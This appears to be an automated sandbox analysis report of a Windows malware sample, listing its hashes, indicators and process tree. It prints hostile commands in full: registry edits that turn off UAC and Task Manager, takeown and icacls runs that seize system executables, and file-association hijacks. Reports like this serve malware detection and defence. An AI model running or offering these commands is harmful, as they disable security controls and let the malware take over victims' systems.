Analysis
max time kernel: 120s
max time network: 92s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02-10-2024 21:32

Static task: static1

Behavioral task: behavioral1
Sample: 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Resource: win10v2004-20240802-en

General
Target: 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Size: 514KB
MD5: 65c713d83b613d647d369ed305632930
SHA1: eb79bea11c59b78498dbf65679ba1a24203e8d9e
SHA256: 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878f
SHA512: 26d9af89110278380c85c8193d44ac1002e4df88dfce7312402f2bd6b6e610e92559600a71068c54a17598429f55a36cc69998cb210f6ceb964d5f53f31032b5
SSDEEP: 6144:/pW2bgbbV28okoS1oWMkdlZQ5iinNrv26FYLIcw/3ScNAf3:/pW2IoioS6p7q
Malware Config
Signatures
-
Processes:
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
pid Process (64 entries):
1408 icacls.exe, 1652 icacls.exe, 312 icacls.exe, 1552 takeown.exe, 1396 takeown.exe, 1680 icacls.exe, 3064 icacls.exe, 1156 icacls.exe,
4012 takeown.exe, 692 icacls.exe, 4020 takeown.exe, 2560 takeown.exe, 2528 takeown.exe, 3488 takeown.exe, 3028 takeown.exe, 4292 icacls.exe,
2112 icacls.exe, 752 takeown.exe, 3712 icacls.exe, 4816 takeown.exe, 3940 takeown.exe, 3020 takeown.exe, 4332 takeown.exe, 1176 takeown.exe,
4852 takeown.exe, 976 takeown.exe, 1784 icacls.exe, 3712 icacls.exe, 4272 takeown.exe, 1516 takeown.exe, 1552 icacls.exe, 4716 icacls.exe,
1476 icacls.exe, 2368 takeown.exe, 2244 icacls.exe, 872 takeown.exe, 3432 takeown.exe, 3880 icacls.exe, 2088 takeown.exe, 1244 takeown.exe,
2484 takeown.exe, 1188 takeown.exe, 884 icacls.exe, 2872 takeown.exe, 2208 takeown.exe, 3892 icacls.exe, 3608 icacls.exe, 868 icacls.exe,
3160 takeown.exe, 1588 takeown.exe, 1780 icacls.exe, 1680 takeown.exe, 4592 takeown.exe, 4424 takeown.exe, 1032 takeown.exe, 3080 takeown.exe,
4804 icacls.exe, 5100 icacls.exe, 3104 takeown.exe, 1920 takeown.exe, 5048 takeown.exe, 3548 takeown.exe, 2536 icacls.exe, 3004 takeown.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Modifies file permissions 1 TTPs 64 IoCs
Processes:
pid Process (64 entries):
2192 icacls.exe, 868 icacls.exe, 1292 takeown.exe, 2344 takeown.exe, 612 icacls.exe, 976 takeown.exe, 4332 takeown.exe, 1176 takeown.exe,
3400 icacls.exe, 2528 takeown.exe, 5020 icacls.exe, 1316 takeown.exe, 1680 icacls.exe, 692 icacls.exe, 2484 takeown.exe, 1780 icacls.exe,
1336 icacls.exe, 3548 takeown.exe, 4380 takeown.exe, 1156 icacls.exe, 1784 icacls.exe, 3104 takeown.exe, 1476 icacls.exe, 2220 takeown.exe,
4816 takeown.exe, 4852 icacls.exe, 1772 takeown.exe, 3704 takeown.exe, 3312 takeown.exe, 4804 icacls.exe, 3940 takeown.exe, 2148 icacls.exe,
2380 takeown.exe, 3712 icacls.exe, 2444 icacls.exe, 4644 icacls.exe, 4756 icacls.exe, 2372 takeown.exe, 1308 icacls.exe, 1516 icacls.exe,
1552 icacls.exe, 732 takeown.exe, 3624 takeown.exe, 4716 icacls.exe, 2208 takeown.exe, 3064 icacls.exe, 1560 icacls.exe, 872 takeown.exe,
3260 icacls.exe, 2872 takeown.exe, 4572 icacls.exe, 4676 takeown.exe, 3892 icacls.exe, 4280 takeown.exe, 5032 icacls.exe, 5060 takeown.exe,
5000 takeown.exe, 3160 takeown.exe, 3956 icacls.exe, 4864 takeown.exe, 1548 takeown.exe, 2728 icacls.exe, 3004 takeown.exe, 1556 icacls.exe
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" | 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
description | ioc | Process
File opened for modification | C:\Windows\System32\winrs.exe | 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 10 IoCs
Processes:
description | ioc | Process (all 10 entries set by 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe)
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe CMDSF %1"
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe VBSSF %1"
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe HTMWF %1"
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1"
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1"
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe RTFDF %1"
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
pid | Process
3612 | 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe (this same entry is listed 20 times in the report)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | Process
3612 | 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
description | pid | Process
Token: SeDebugPrivilege | 3612 | 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Token: SeTakeOwnershipPrivilege | takeown.exe, one entry per pid (22 entries): 1660, 2180, 1264, 3640, 3284, 3972, 748, 732, 3184, 1376, 2560, 3624, 3312, 3412, 4132, 2088, 4012, 3004, 848, 4728, 4676, 2484
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | Process | procid_target
Every entry has pid 3612 and Process 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe; each of the 32 targets below appears twice in the report (64 IoCs in total).
PID 3612 wrote to memory of 2480 | procid_target 85
PID 3612 wrote to memory of 3052 | procid_target 87
PID 3612 wrote to memory of 1660 | procid_target 98
PID 3612 wrote to memory of 824 | procid_target 100
PID 3612 wrote to memory of 2180 | procid_target 101
PID 3612 wrote to memory of 2520 | procid_target 104
PID 3612 wrote to memory of 1264 | procid_target 106
PID 3612 wrote to memory of 4572 | procid_target 108
PID 3612 wrote to memory of 3640 | procid_target 110
PID 3612 wrote to memory of 4292 | procid_target 112
PID 3612 wrote to memory of 3284 | procid_target 114
PID 3612 wrote to memory of 4244 | procid_target 115
PID 3612 wrote to memory of 3972 | procid_target 117
PID 3612 wrote to memory of 2196 | procid_target 120
PID 3612 wrote to memory of 748 | procid_target 122
PID 3612 wrote to memory of 708 | procid_target 124
PID 3612 wrote to memory of 732 | procid_target 126
PID 3612 wrote to memory of 3916 | procid_target 128
PID 3612 wrote to memory of 3184 | procid_target 130
PID 3612 wrote to memory of 2408 | procid_target 132
PID 3612 wrote to memory of 1376 | procid_target 133
PID 3612 wrote to memory of 692 | procid_target 134
PID 3612 wrote to memory of 3624 | procid_target 136
PID 3612 wrote to memory of 1156 | procid_target 138
PID 3612 wrote to memory of 3412 | procid_target 139
PID 3612 wrote to memory of 5032 | procid_target 141
PID 3612 wrote to memory of 2560 | procid_target 144
PID 3612 wrote to memory of 3260 | procid_target 145
PID 3612 wrote to memory of 3312 | procid_target 147
PID 3612 wrote to memory of 5024 | procid_target 151
PID 3612 wrote to memory of 4012 | procid_target 152
PID 3612 wrote to memory of 4372 | procid_target 153
Processes

C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe (level 1)
"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"
- Checks computer location settings
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3612

C:\Windows\System32\reg.exe (level 2)
"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- UAC bypass
- Modifies registry key
PID:2480

C:\Windows\System32\reg.exe (level 2)
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- Modifies registry key
PID:3052

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\bfsvc.exe"
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:824

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\HelpPane.exe"
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:2520

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\hh.exe"
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Modifies file permissions
PID:4572

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\splwow64.exe"
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Possible privilege escalation attempt
PID:4292

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\winhlp32.exe"
- Suspicious use of AdjustPrivilegeToken
PID:3284

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:4244

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\write.exe"
- Suspicious use of AdjustPrivilegeToken
PID:3972

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:2196

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\raserver.exe"
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:708

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\msra.exe"
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:732

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:3916

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"
- Suspicious use of AdjustPrivilegeToken
PID:3184

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:2408

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Possible privilege escalation attempt
- Modifies file permissions
PID:692

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3624

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Possible privilege escalation attempt
- Modifies file permissions
PID:1156

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\logagent.exe"
- Suspicious use of AdjustPrivilegeToken
PID:3412

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Modifies file permissions
PID:5032

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2560

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Modifies file permissions
PID:3260

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3312

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:5024

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:4012

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:4372

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"
- Suspicious use of AdjustPrivilegeToken
PID:4728

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Modifies file permissions
PID:2728

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"
- Suspicious use of AdjustPrivilegeToken
PID:4132

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:3048

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\runas.exe"
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Modifies file permissions
PID:1308

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3004

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:2188

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"
- Suspicious use of AdjustPrivilegeToken
PID:848

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:3568

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4676

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:4048

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2484

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Modifies file permissions
PID:1516

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
PID:4072

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Possible privilege escalation attempt
- Modifies file permissions
PID:1552

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Possible privilege escalation attempt
PID:1920

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:2476

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Possible privilege escalation attempt
PID:3432

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Possible privilege escalation attempt
- Modifies file permissions
PID:3712

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
PID:4828

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Possible privilege escalation attempt
- Modifies file permissions
PID:1784

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
PID:4388

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Modifies file permissions
PID:2444

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Possible privilege escalation attempt
PID:2368

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:1980

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Possible privilege escalation attempt
- Modifies file permissions
PID:3940

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Modifies file permissions
PID:2148

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
PID:3672

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:1316

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
PID:3128

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:2116

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
PID:4776

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:3948

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Modifies file permissions
PID:5060

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:1296

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Possible privilege escalation attempt
PID:5048

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Possible privilege escalation attempt
PID:2536

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Possible privilege escalation attempt
PID:3080

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Possible privilege escalation attempt
- Modifies file permissions
PID:4716

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Possible privilege escalation attempt
- Modifies file permissions
PID:3160

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Possible privilege escalation attempt
PID:2112

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Possible privilege escalation attempt
- Modifies file permissions
PID:2872

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
- Modifies file permissions
PID:4644

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Modifies file permissions
PID:5000

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:1120

C:\Windows\System32\takeown.exe (level 2)
"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"
- Possible privilege escalation attempt
PID:1680

C:\Windows\System32\icacls.exe (level 2)
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)
PID:2736
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1868
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4768
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:944
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1556
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3504
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2264
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4756
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4384
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1552
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2684
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2332
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3956
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1712
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4552
-
-
